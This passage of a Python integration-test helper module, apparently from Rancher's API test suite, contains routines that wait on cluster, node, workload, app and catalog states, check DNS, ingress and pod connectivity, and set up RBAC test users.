timeout: raise Exception('Timed out waiting for LB to become active') return def check_for_no_access(url, verify=False): try: requests.get(url, verify=verify) return False except requests.ConnectionError: print("Connection Error - " + url) return True def wait_until_active(url, timeout=120): start = time.time() while check_for_no_access(url): time.sleep(.5) print("No access yet") if time.time() - start > timeout: raise Exception('Timed out waiting for url ' 'to become active') return def wait_until_ok(url, timeout=120, headers={}): start = time.time() while not check_if_ok(url, headers=headers): time.sleep(.5) if time.time() - start > timeout: raise Exception( 'Timed out waiting for {0} to become ok'.format(url) ) return def check_if_ok(url, verify=False, headers={}): try: res = requests.head(url, verify=verify, headers=headers) if res.status_code == 200: return True return False except requests.ConnectionError: print("Connection Error - " + url) return False def validate_http_response(cmd, target_name_list, client_pod=None, insecure=False): if client_pod is None and cmd.startswith("http://"): wait_until_active(cmd, 60) target_hit_list = target_name_list[:] count = 5 * len(target_name_list) for i in range(1, count): if len(target_hit_list) == 0: break if client_pod is None: curl_cmd = "curl " + cmd if insecure: curl_cmd += "\t--insecure" result = run_command(curl_cmd) else: if is_windows(): wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \ '"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \ '{0}).Content }}"'.format(cmd) else: wget_cmd = "wget -qO- " + cmd result = kubectl_pod_exec(client_pod, wget_cmd) result = result.decode() result = result.rstrip() assert result in target_name_list if result in target_hit_list: target_hit_list.remove(result) print("After removing all, the rest is: ", target_hit_list) assert len(target_hit_list) == 0 def validate_cluster(client, cluster, intermediate_state="provisioning", check_intermediate_state=True, skipIngresscheck=True, nodes_not_in_active_state=[], k8s_version="", userToken=USER_TOKEN): # Allow sometime for the "cluster_owner" CRTB to take effect time.sleep(5) cluster = validate_cluster_state( client, cluster, check_intermediate_state=check_intermediate_state, intermediate_state=intermediate_state, nodes_not_in_active_state=nodes_not_in_active_state) # Create Daemon set workload and have an Ingress with Workload # rule pointing to this daemonset create_kubeconfig(cluster) if k8s_version != "": check_cluster_version(cluster, k8s_version) if hasattr(cluster, 'rancherKubernetesEngineConfig'): check_cluster_state(len(get_role_nodes(cluster, "etcd", client))) project, ns = create_project_and_ns(userToken, cluster) p_client = get_project_client_for_token(project, userToken) con = [{"name": "test1", "image": TEST_IMAGE}] name = random_test_name("default") workload = p_client.create_workload(name=name, containers=con, namespaceId=ns.id, daemonSetConfig={}) validate_workload(p_client, workload, "daemonSet", ns.name, len(get_schedulable_nodes(cluster, client))) if not skipIngresscheck: pods = p_client.list_pod(workloadId=workload["id"]).data scale = len(pods) # test service discovery validate_service_discovery(workload, scale, p_client, ns, pods) host = "test" + str(random_int(10000, 99999)) + ".com" path = "/name.html" rule = {"host": host, "paths": [{"workloadIds": [workload.id], "targetPort": "80"}]} ingress = p_client.create_ingress(name=name, namespaceId=ns.id, rules=[rule]) wait_for_ingress_to_active(p_client, ingress) validate_ingress(p_client, cluster, [workload], host, path) return cluster def check_cluster_version(cluster, version): cluster_k8s_version = \ cluster.appliedSpec["rancherKubernetesEngineConfig"][ "kubernetesVersion"] assert cluster_k8s_version == version, \ "cluster_k8s_version: " + cluster_k8s_version + \ " Expected: " + version expected_k8s_version = version[:version.find("-")] k8s_version = execute_kubectl_cmd("version") kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"] assert kubectl_k8s_version == expected_k8s_version, \ "kubectl version: " + kubectl_k8s_version + \ " Expected: " + expected_k8s_version def check_cluster_state(etcd_count): css_resp = execute_kubectl_cmd("get cs") css = css_resp["items"] components = ["scheduler", "controller-manager"] for i in range(0, etcd_count): components.append("etcd-" + str(i)) print("components to check - " + str(components)) for cs in css: component_name = cs["metadata"]["name"] assert component_name in components components.remove(component_name) assert cs["conditions"][0]["status"] == "True" assert cs["conditions"][0]["type"] == "Healthy" assert len(components) == 0 def validate_dns_record(pod, record, expected): # requires pod with `dig` available - TEST_IMAGE host = '{0}.{1}.svc.cluster.local'.format( record["name"], record["namespaceId"]) validate_dns_entry(pod, host, expected) def validate_dns_entry(pod, host, expected): if is_windows(): validate_dns_entry_windows(pod, host, expected) return # requires pod with `dig` available - TEST_IMAGE cmd = 'ping -c 1 -W 1 {0}'.format(host) ping_output = kubectl_pod_exec(pod, cmd) ping_validation_pass = False for expected_value in expected: if expected_value in str(ping_output): ping_validation_pass = True break assert ping_validation_pass is True assert " 0% packet loss" in str(ping_output) dig_cmd = 'dig {0} +short'.format(host) dig_output = kubectl_pod_exec(pod, dig_cmd) for expected_value in expected: assert expected_value in str(dig_output) def validate_dns_entry_windows(pod, host, expected): def ping_check(): ping_cmd = 'ping -w 1 -n 1 {0}'.format(host) ping_output = kubectl_pod_exec(pod, ping_cmd) ping_validation_pass = False for expected_value in expected: if expected_value in str(ping_output): ping_validation_pass = True break return ping_validation_pass and (" (0% loss)" in str(ping_output)) wait_for(callback=ping_check, timeout_message="Failed to ping {0}".format(host)) def dig_check(): dig_cmd = 'powershell -NoLogo -NonInteractive -Command ' \ '"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host) dig_output = kubectl_pod_exec(pod, dig_cmd) dig_validation_pass = True for expected_value in expected: if expected_value not in str(dig_output): dig_validation_pass = False break return dig_validation_pass wait_for(callback=dig_check, timeout_message="Failed to resolve {0}".format(host)) def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT): """ Checks whether dns_record got deleted successfully. Validates if dns_record is null in for current object client. @param client: Object client use to create dns_record @param dns_record: record object subjected to be deleted @param timeout: Max time to keep checking whether record is deleted or not """ time.sleep(2) start = time.time() records = client.list_dns_record(name=dns_record.name, ).data while len(records) != 0: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for record {} to be deleted" "".format(dns_record.name)) time.sleep(.5) records = client.list_dns_record(name=dns_record.name, ).data def wait_for_nodes_to_become_active(client, cluster, exception_list=[], retry_count=0): nodes = client.list_node(clusterId=cluster.id).data node_auto_deleted = False for node in nodes: if node.requestedHostname not in exception_list: node = wait_for_node_status(client, node, "active") if node is None: print("Need to re-evalauate new node list") node_auto_deleted = True retry_count += 1 print("Retry Count:" + str(retry_count)) if node_auto_deleted and retry_count < 5: wait_for_nodes_to_become_active(client, cluster, exception_list, retry_count) def wait_for_node_status(client, node, state): uuid = node.uuid start = time.time() nodes = client.list_node(uuid=uuid).data node_count = len(nodes) # Handle the case of nodes getting auto deleted when they are part of # nodepools if node_count == 1: node_status = nodes[0].state else: print("Node does not exist anymore -" + uuid) return None while node_status != state: if time.time() - start > MACHINE_TIMEOUT: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(5) nodes = client.list_node(uuid=uuid).data node_count = len(nodes) if node_count == 1: node_status = nodes[0].state else: print("Node does not exist anymore -" + uuid) return None return node def wait_for_node_to_be_deleted(client, node, timeout=300): uuid = node.uuid start = time.time() nodes = client.list_node(uuid=uuid).data node_count = len(nodes) while node_count != 0: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) nodes = client.list_node(uuid=uuid).data node_count = len(nodes) def wait_for_cluster_node_count(client, cluster, expected_node_count, timeout=300): start = time.time() nodes = client.list_node(clusterId=cluster.id).data node_count = len(nodes) while node_count != expected_node_count: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) nodes = client.list_node(clusterId=cluster.id).data node_count = len(nodes) def get_custom_host_registration_cmd(client, cluster, roles, node): allowed_roles = ["etcd", "worker", "controlplane"] cluster_tokens = client.list_cluster_registration_token( clusterId=cluster.id).data if len(cluster_tokens) > 0: cluster_token = cluster_tokens[0] else: cluster_token = create_custom_host_registration_token(client, cluster) additional_options = " --address " + node.public_ip_address + \ " --internal-address " + node.private_ip_address if 'Administrator' == node.ssh_user: cmd = cluster_token.windowsNodeCommand cmd = cmd.replace('| iex', '--worker' + additional_options + ' | iex ') else: cmd = cluster_token.nodeCommand for role in roles: assert role in allowed_roles cmd += " --" + role cmd += additional_options return cmd def create_custom_host_registration_token(client, cluster): # Allow sometime for the "cluster_owner" CRTB to take effect time.sleep(5) cluster_token = client.create_cluster_registration_token( clusterId=cluster.id) cluster_token = client.wait_success(cluster_token) assert cluster_token.state == 'active' return cluster_token def get_cluster_by_name(client, name): clusters = client.list_cluster(name=name).data assert len(clusters) == 1, "Cluster " + name + " does not exist" return clusters[0] def get_cluster_type(client, cluster): cluster_configs = [ "amazonElasticContainerServiceConfig", "azureKubernetesServiceConfig", "googleKubernetesEngineConfig", "rancherKubernetesEngineConfig" ] if "rancherKubernetesEngineConfig" in cluster: nodes = client.list_node(clusterId=cluster.id).data if len(nodes) > 0: if nodes[0].nodeTemplateId is None: return "Custom" for cluster_config in cluster_configs: if cluster_config in cluster: return cluster_config return "Imported" def delete_cluster(client, cluster): nodes = client.list_node(clusterId=cluster.id).data # Delete nodes(in cluster) from AWS for Imported and Custom Cluster if len(nodes) > 0: cluster_type = get_cluster_type(client, cluster) print(cluster_type) if get_cluster_type(client, cluster) in ["Imported", "Custom"]: filters = [ {'Name': 'tag:Name', 'Values': ['testcustom*', 'teststress*', 'testsa*']}] ip_filter = {} ip_list = [] ip_filter['Name'] = \ 'network-interface.addresses.association.public-ip' ip_filter['Values'] = ip_list filters.append(ip_filter) for node in nodes: host_ip = resolve_node_ip(node) ip_list.append(host_ip) assert len(ip_filter) > 0 print(ip_filter) aws_nodes = AmazonWebServices().get_nodes(filters) if aws_nodes is None: # search instances by IPs in case names do not follow patterns aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter]) if aws_nodes is None: print("no instance is found in AWS") else: for node in aws_nodes: print(node.public_ip_address) AmazonWebServices().delete_nodes(aws_nodes) # Delete Cluster client.delete(cluster) def check_connectivity_between_workloads(p_client1, workload1, p_client2, workload2, allow_connectivity=True): wl1_pods = p_client1.list_pod(workloadId=workload1.id).data wl2_pods = p_client2.list_pod(workloadId=workload2.id).data for pod in wl1_pods: for o_pod in wl2_pods: check_connectivity_between_pods(pod, o_pod, allow_connectivity) def check_connectivity_between_workload_pods(p_client, workload): pods = p_client.list_pod(workloadId=workload.id).data for pod in pods: for o_pod in pods: check_connectivity_between_pods(pod, o_pod) def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True): pod_ip = pod2.status.podIp cmd = "ping -c 1 -W 1 " + pod_ip if is_windows(): cmd = 'ping -w 1 -n 1 {0}'.format(pod_ip) response = kubectl_pod_exec(pod1, cmd) assert pod_ip in str(response) if allow_connectivity: if is_windows(): assert " (0% loss)" in str(response) else: assert " 0% packet loss" in str(response) else: if is_windows(): assert " (100% loss)" in str(response) else: assert " 100% packet loss" in str(response) def kubectl_pod_exec(pod, cmd): command = "exec " + pod.name + " -n " + pod.namespaceId + " -- " + cmd return execute_kubectl_cmd(command, json_out=False, stderr=True) def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) if sshKey: ssh.connect(ip, username=user, key_filename=sshKey, port=port) else: ssh.connect(ip, username=user, password=password, port=port) stdin, stdout, stderr = ssh.exec_command(cmd) response = stdout.readlines() return response def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT): start = time.time() time.sleep(2) nss = client.list_namespace(uuid=ns.uuid).data assert len(nss) == 1 ns = nss[0] while ns.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) nss = client.list_namespace(uuid=ns.uuid).data assert len(nss) == 1 ns = nss[0] return ns def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods, timeout=DEFAULT_TIMEOUT): start = time.time() for key, value in workload.workloadLabels.items(): label = key + "=" + value get_pods = "get pods -l" + label + " -n " + ns_name pods = execute_kubectl_cmd(get_pods) for x in range(0, numofpods - 1): pod = pods["items"][x] podimage = pod["spec"]["containers"][0]["image"] while podimage != expectedimage: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for correct pod images") time.sleep(.5) pods = execute_kubectl_cmd(get_pods) pod = pods["items"][x] podimage = pod["spec"]["containers"][0]["image"] def wait_for_pods_in_workload(p_client, workload, pod_count, timeout=DEFAULT_TIMEOUT): start = time.time() pods = p_client.list_pod(workloadId=workload.id).data while len(pods) != pod_count: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for pods in workload {}. Expected {}. " "Got {}".format(workload.name, pod_count, len(pods))) time.sleep(.5) pods = p_client.list_pod(workloadId=workload.id).data return pods def get_user_client_and_cluster(client=None): if not client: client = get_user_client() if CLUSTER_NAME == "": clusters = client.list_cluster().data else: clusters = client.list_cluster(name=CLUSTER_NAME).data assert len(clusters) > 0 cluster = clusters[0] return client, cluster def get_global_admin_client_and_cluster(): client = get_admin_client() if CLUSTER_NAME == "": clusters = client.list_cluster().data else: clusters = client.list_cluster(name=CLUSTER_NAME).data assert len(clusters) > 0 cluster = clusters[0] return client, cluster def validate_cluster_state(client, cluster, check_intermediate_state=True, intermediate_state="provisioning", nodes_not_in_active_state=[]): if check_intermediate_state: cluster = wait_for_condition( client, cluster, lambda x: x.state == intermediate_state, lambda x: 'State is: ' + x.state, timeout=MACHINE_TIMEOUT) assert cluster.state == intermediate_state cluster = wait_for_condition( client, cluster, lambda x: x.state == "active", lambda x: 'State is: ' + x.state, timeout=MACHINE_TIMEOUT) assert cluster.state == "active" wait_for_nodes_to_become_active(client, cluster, exception_list=nodes_not_in_active_state) timeout = 60 start = time.time() while "version" not in cluster.keys(): time.sleep(1) cluster = client.reload(cluster) delta = time.time() - start if delta > timeout: msg = "Timeout waiting for K8s version to be synced" raise Exception(msg) return cluster def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT): start = time.time() sleep = 0.01 while True: time.sleep(sleep) sleep *= 2 if sleep > 2: sleep = 2 try: obj = client.reload(obj) except ApiError as e: if e.error.status != 403: raise e else: return obj delta = time.time() - start if delta > timeout: msg = 'Timeout waiting for [{}:{}] for condition after {}' \ ' seconds'.format(obj.type, obj.id, delta) raise Exception(msg) def delete_node(aws_nodes): for node in aws_nodes: AmazonWebServices().delete_node(node) def cluster_cleanup(client, cluster, aws_nodes=None): if RANCHER_CLEANUP_CLUSTER: client.delete(cluster) if aws_nodes is not None: delete_node(aws_nodes) else: env_details = "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'\n" env_details += "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'\n" env_details += "env.USER_TOKEN='" + USER_TOKEN + "'\n" env_details += "env.CLUSTER_NAME='" + cluster.name + "'\n" create_config_file(env_details) def create_config_file(env_details): file = open(env_file, "w") file.write(env_details) file.close() def validate_hostPort(p_client, workload, source_port, cluster): get_endpoint_url_for_workload(p_client, workload) wl = p_client.list_workload(uuid=workload.uuid).data[0] source_port_wk = wl.publicEndpoints[0]["port"] assert source_port == source_port_wk, "Source ports do not match" pods = p_client.list_pod(workloadId=workload.id).data nodes = get_schedulable_nodes(cluster) for node in nodes: target_name_list = [] for pod in pods: print(pod.nodeId + " check " + node.id) if pod.nodeId == node.id: target_name_list.append(pod.name) break if len(target_name_list) > 0: host_ip = resolve_node_ip(node) curl_cmd = " http://" + host_ip + ":" + \ str(source_port) + "/name.html" validate_http_response(curl_cmd, target_name_list) def validate_lb(p_client, workload, source_port): url = get_endpoint_url_for_workload(p_client, workload) wl = p_client.list_workload(uuid=workload.uuid).data[0] source_port_wk = wl.publicEndpoints[0]["port"] assert source_port == source_port_wk, "Source ports do not match" target_name_list = get_target_names(p_client, [workload]) wait_until_lb_is_active(url) validate_http_response(url + "/name.html", target_name_list) def validate_nodePort(p_client, workload, cluster, source_port): get_endpoint_url_for_workload(p_client, workload, 600) wl = p_client.list_workload(uuid=workload.uuid).data[0] source_port_wk = wl.publicEndpoints[0]["port"] assert source_port == source_port_wk, "Source ports do not match" nodes = get_schedulable_nodes(cluster) pods = p_client.list_pod(workloadId=wl.id).data target_name_list = [] for pod in pods: target_name_list.append(pod.name) print("target name list:" + str(target_name_list)) for node in nodes: host_ip = resolve_node_ip(node) curl_cmd = " http://" + host_ip + ":" + \ str(source_port_wk) + "/name.html" validate_http_response(curl_cmd, target_name_list) def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port): pods = p_client.list_pod(workloadId=workload.id).data target_name_list = [] for pod in pods: target_name_list.append(pod["name"]) curl_cmd = "http://" + cluster_ip + ":" + \ str(source_port) + "/name.html" for pod in test_pods: validate_http_response(curl_cmd, target_name_list, pod) def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT): start = time.time() time.sleep(2) list = c_client.list_persistent_volume(uuid=pv_object.uuid).data assert len(list) == 1 pv = list[0] while pv.state != "available": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to available") time.sleep(.5) list = c_client.list_persistent_volume(uuid=pv_object.uuid).data assert len(list) == 1 pv = list[0] return pv def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT): start = time.time() time.sleep(2) list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data assert len(list) == 1 pvc = list[0] while pvc.state != "bound": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to bound") time.sleep(.5) list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data assert len(list) == 1 pvc = list[0] return pvc def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name, mount_path, sub_path, is_daemonSet=False): volumes = [{"type": "volume", "name": "vol1", "persistentVolumeClaim": { "readOnly": "false", "type": "persistentVolumeClaimVolumeSource", "persistentVolumeClaimId": pvc_name }}] volumeMounts = [{"readOnly": "False", "type": "volumeMount", "mountPath": mount_path, "subPath": sub_path, "name": "vol1" }] con = [{"name": "test1", "image": TEST_IMAGE, "volumeMounts": volumeMounts }] if is_daemonSet: workload = p_client.create_workload(name=wl_name, containers=con, namespaceId=ns_id, volumes=volumes, daemonSetConfig={}) else: workload = p_client.create_workload(name=wl_name, containers=con, namespaceId=ns_id, volumes=volumes) return workload def write_content_to_file(pod, content, filename): cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content) if is_windows(): cmd_write = \ 'powershell -NoLogo -NonInteractive -Command ' \ '"& { echo {1} > {0} }"'.format(filename, content) output = kubectl_pod_exec(pod, cmd_write) assert output.strip().decode('utf-8') == "" def validate_file_content(pod, content, filename): cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename) if is_windows(): cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \ '"& { cat {0} }"'.format(filename) output = kubectl_pod_exec(pod, cmd_get_content) assert output.strip().decode('utf-8') == content def wait_for_mcapp_to_active(client, multiClusterApp, timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT): time.sleep(5) # When the app is deployed it goes into Active state for a short # period of time and then into installing/deploying. mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid, name=multiClusterApp.name).data start = time.time() assert len(mcapps) == 1, "Cannot find multi cluster app" mapp = mcapps[0] while mapp.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) multiclusterapps = client.list_multiClusterApp( uuid=multiClusterApp.uuid, name=multiClusterApp.name).data assert len(multiclusterapps) == 1 mapp = multiclusterapps[0] return mapp def wait_for_app_to_active(client, app_id, timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT): """ First wait for app to come in deployment state, then wait for it get in active state. This is to avoid wrongly conclude that app is active as app goes to state installing > active > deploying > active @param client: Project client @param app_id: App id of deployed app. @param timeout: Max time allowed to wait for app to become active. @return: app object """ start = time.time() app_data = client.list_app(id=app_id).data while len(app_data) == 0: if time.time() - start > timeout / 10: raise AssertionError( "Timed out waiting for listing the app from API") time.sleep(.2) app_data = client.list_app(id=app_id).data application = app_data[0] while application.state != "deploying": if time.time() - start > timeout / 3: break time.sleep(.2) app_data = client.list_app(id=app_id).data application = app_data[0] while application.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) app = client.list_app(id=app_id).data assert len(app) >= 1 application = app[0] return application def validate_response_app_endpoint(p_client, appId, timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT): ingress_list = p_client.list_ingress(namespaceId=appId).data assert len(ingress_list) == 1 ingress = ingress_list[0] if hasattr(ingress, 'publicEndpoints'): for public_endpoint in ingress.publicEndpoints: url = \ public_endpoint["protocol"].lower() + "://" + \ public_endpoint["hostname"] print(url) start = time.time() try: while True: r = requests.head(url) print(r.status_code) if r.status_code == 200: return if time.time() - start > timeout: raise AssertionError( "Timed out waiting response to be 200.") time.sleep(.5) except requests.ConnectionError: print("failed to connect") assert False, "failed to connect to the app" def resolve_node_ip(node): if hasattr(node, 'externalIpAddress'): node_ip = node.externalIpAddress else: node_ip = node.ipAddress return node_ip def provision_nfs_server(): node = AmazonWebServices().create_node(random_test_name("nfs-server")) node.wait_for_ssh_ready() c_path = os.getcwd() cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh" command = open(cmd_path, 'r').read() node.execute_command(command) return node def get_defaut_question_answers(client, externalId): def get_answer(quest): if "default" in quest.keys(): answer = quest["default"] else: answer = "" # If required and no default value is available, set fake value # only for type string . For other types error out if "required" in quest.keys(): if quest["required"]: if quest["type"] == "enum" and "options" in quest.keys(): answer = quest["options"][0] elif quest["type"] == "password": answer = "R@ncher135" elif quest["type"] == "string": answer = "fake" else: assert False, \ "Cannot set default for types {}" \ "".format(quest["type"]) return answer def check_if_question_needed(questions_and_answers, ques): add_question = False match_string = ques["showIf"] match_q_as = match_string.split("&&") for q_a in match_q_as: items = q_a.split("=") if len(items) == 1: items.append("") if items[0] in questions_and_answers.keys(): if questions_and_answers[items[0]] == items[1]: add_question = True else: add_question = False break return add_question questions_and_answers = {} print("external id = {}".format(externalId)) template_revs = client.list_template_version(externalId=externalId).data assert len(template_revs) == 1 template_rev = template_revs[0] questions = template_rev.questions for ques in questions: add_question = True if "showIf" in ques.keys(): add_question = \ check_if_question_needed(questions_and_answers, ques) if add_question: question = ques["variable"] answer = get_answer(ques) questions_and_answers[question] = get_answer(ques) if "showSubquestionIf" in ques.keys(): if ques["showSubquestionIf"] == answer: sub_questions = ques["subquestions"] for sub_question in sub_questions: question = sub_question["variable"] questions_and_answers[question] = \ get_answer(sub_question) print("questions_and_answers = {}".format(questions_and_answers)) return questions_and_answers def validate_app_deletion(client, app_id, timeout=DEFAULT_APP_DELETION_TIMEOUT): app_data = client.list_app(id=app_id).data start = time.time() if len(app_data) == 0: return application = app_data[0] while application.state == "removing": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for app to delete") time.sleep(.5) app = client.list_app(id=app_id).data if len(app) == 0: break def validate_catalog_app(proj_client, app, external_id, answer=None): """ This method validates all the workloads deployed are in active state, have correct version and validates the answers. @param proj_client: Project client object of a existing project. @param app: Deployed app object. @param external_id: URl of app API. @param answer: answer, app seek while deploying, body of the post call. @return: Deployed app object. """ if answer is None: answers = get_defaut_question_answers(get_user_client(), external_id) else: answers = answer # validate app is active app = wait_for_app_to_active(proj_client, app.id) assert app.externalId == external_id, \ "the version of the app is not correct" # check if associated workloads are active ns = app.targetNamespace parameters = external_id.split('&') assert len(parameters) > 1, \ "Incorrect list of parameters from catalog external ID" chart_prefix = parameters[len(parameters) - 2].split("=")[1] chart_suffix = parameters[len(parameters) - 1].split("=")[1] chart = chart_prefix + "-" + chart_suffix app_name = parameters[len(parameters) - 2].split("=")[1] workloads = proj_client.list_workload(namespaceId=ns).data for wl in workloads: print("Workload {} , state - {}".format(wl.id, wl.state)) assert wl.state == "active" chart_deployed = get_chart_info(wl.workloadLabels) print("Chart detail of app - {}".format(chart_deployed)) # '-' check is to make sure chart has both app name and version. if app_name in chart_deployed and '-' in chart_deployed: assert chart_deployed == chart, "the chart version is wrong" # Validate_app_answers assert len(answers.items() - app["answers"].items()) == 0, \ "Answers are not same as the original catalog answers" return app def get_chart_info(workloadlabels): """ This method finds either 'chart' tag or 'helm.sh/chart' tag from workload API @param workloadlabels: workloadslabel object @return: chart value of workload e.g. 'app_name-version' """ if "chart" in workloadlabels.keys(): return workloadlabels.chart elif "helm.sh/chart" in workloadlabels.keys(): return workloadlabels["helm.sh/chart"] else: return '' def create_user(client, cattle_auth_url=CATTLE_AUTH_URL): user_name = random_name() user = client.create_user(username=user_name, password=USER_PASSWORD) client.create_global_role_binding(globalRoleId="user", subjectKind="User", userId=user.id) user_token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url) return user, user_token def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL): r = requests.post(cattle_auth_url, json={ 'username': username, 'password': password, 'responseType': 'json', }, verify=False) print(r.json()) return r.json()["token"] def rbac_get_user_by_role(role): if role in rbac_data["users"].keys(): return rbac_data["users"][role]["user"] return None def rbac_get_user_token_by_role(role): if role in rbac_data["users"].keys(): return rbac_data["users"][role]["token"] return None def rbac_get_kubeconfig_by_role(role): if role in rbac_data["users"].keys(): return rbac_data["users"][role]["kubeconfig"] return None def rbac_get_project(): return rbac_data["project"] def rbac_get_namespace(): return rbac_data["namespace"] def rbac_get_workload(): return rbac_data["workload"] def rbac_get_unshared_project(): return rbac_data["p_unshared"] def rbac_get_unshared_ns(): return rbac_data["ns_unshared"] def rbac_get_unshared_workload(): return rbac_data["wl_unshared"] def rbac_prepare(): """this function creates one project, one namespace, and four users with different roles""" admin_client, cluster = get_global_admin_client_and_cluster() create_kubeconfig(cluster) # create a new project in the cluster project, ns = create_project_and_ns(ADMIN_TOKEN, cluster, random_test_name("p-test-rbac")) con = [{"name": "test1", "image": TEST_IMAGE}] name = random_test_name("default") p_client = get_project_client_for_token(project, ADMIN_TOKEN) workload = p_client.create_workload(name=name, containers=con, namespaceId=ns.id) validate_workload(p_client, workload, "deployment", ns.name) rbac_data["workload"] = workload rbac_data["project"] = project rbac_data["namespace"] = ns # create new users for key in rbac_data["users"]: user1, token1 = create_user(admin_client) rbac_data["users"][key]["user"] = user1 rbac_data["users"][key]["token"] = token1 # assign different role to each user assign_members_to_cluster(admin_client, rbac_data["users"][CLUSTER_OWNER]["user"], cluster, CLUSTER_OWNER) assign_members_to_cluster(admin_client, rbac_data["users"][CLUSTER_MEMBER]["user"], cluster, CLUSTER_MEMBER) assign_members_to_project(admin_client, rbac_data["users"][PROJECT_MEMBER]["user"], project, PROJECT_MEMBER) assign_members_to_project(admin_client, rbac_data["users"][PROJECT_OWNER]["user"], project, PROJECT_OWNER) assign_members_to_project(admin_client, rbac_data["users"][PROJECT_READ_ONLY]["user"], project, PROJECT_READ_ONLY) # create kubeconfig files for each user for key in rbac_data["users"]: user_client = get_client_for_token(rbac_data["users"][key]["token"]) _, user_cluster = get_user_client_and_cluster(user_client) rbac_data["users"][key]["kubeconfig"] = os.path.join( os.path.dirname(os.path.realpath(__file__)), key + "_kubeconfig") create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"]) # create another project that none of the above users are assigned to p2, ns2 = create_project_and_ns(ADMIN_TOKEN, cluster, random_test_name("p-unshared")) name = random_test_name("default") p_client = get_project_client_for_token(p2, ADMIN_TOKEN) workload = p_client.create_workload(name=name, containers=con, namespaceId=ns2.id) validate_workload(p_client, workload, "deployment", ns2.name) rbac_data["p_unshared"] = p2 rbac_data["ns_unshared"] = ns2 rbac_data["wl_unshared"] = workload def rbac_cleanup(): """ remove the project, namespace and users created for the RBAC tests""" try: client = get_admin_client() except Exception: print("Not able to get admin client. Not performing RBAC cleanup") return for _, value in rbac_data["users"].items(): try: client.delete(value["user"]) except Exception: pass client.delete(rbac_data["project"]) client.delete(rbac_data["wl_unshared"]) client.delete(rbac_data["p_unshared"]) def check_condition(condition_type, status): def _find_condition(resource): if not hasattr(resource, "conditions"): return False if resource.conditions is None: return False for condition in resource.conditions: if condition.type == condition_type and condition.status == status: return True return False return _find_condition def create_catalog_external_id(catalog_name, template, version, project_cluster_id=None, catalog_type=None): if catalog_type is None: return "catalog://?catalog=" + catalog_name + \ "&template=" + template + "&version=" + version elif catalog_type == "project" or catalog_type == "cluster": return "catalog://?catalog=" + project_cluster_id + "/" \ + catalog_name + "&type=" + catalog_type \ + "Catalog&template=" + template + "&version=" + version def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT): time.sleep(2) catalog_data = client.list_catalog(name=catalog.name) print(catalog_data) start = time.time() assert len(catalog_data["data"]) >= 1, "Cannot find catalog" catalog = catalog_data["data"][0] while catalog.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) catalog_data = client.list_catalog(name=catalog.name) assert len(catalog_data["data"]) >= 1 catalog = catalog_data["data"][0] return catalog def readDataFile(data_dir, name): fname = os.path.join(data_dir, name) print("File: " + fname) is_file = os.path.isfile(fname) assert is_file with open(fname) as f: return f.read() def set_url_password_token(RANCHER_SERVER_URL): """Returns a ManagementContext for the default global admin user.""" CATTLE_AUTH_URL = \ RANCHER_SERVER_URL + "/v3-public/localproviders/local?action=login" r = requests.post(CATTLE_AUTH_URL, json={ 'username': 'admin', 'password': 'admin', 'responseType': 'json', }, verify=False) print(r.json()) token = r.json()['token'] print(token) # Change admin password client = rancher.Client(url=RANCHER_SERVER_URL + "/v3", token=token, verify=False) admin_user = client.list_user(username="admin").data admin_user[0].setpassword(newPassword=ADMIN_PASSWORD) # Set server-url settings serverurl = client.list_setting(name="server-url").data client.update(serverurl[0], value=RANCHER_SERVER_URL) return token def validate_create_catalog(token, catalog_name, branch, url, permission=True): """ This function validates if the user has the permission to create a global catalog. :param token: user's token :param catalog_name: the name of the catalog :param branch: the branch of the git repo :param url: the url of the git repo :param permission: boolean value, True if the user can create catalog :return: the catalog object or None """ client = get_client_for_token(token) if not permission: with pytest.raises(ApiError) as e: client.create_catalog(name=catalog_name, branch=branch, url=url) error_msg = "user with no permission should receive 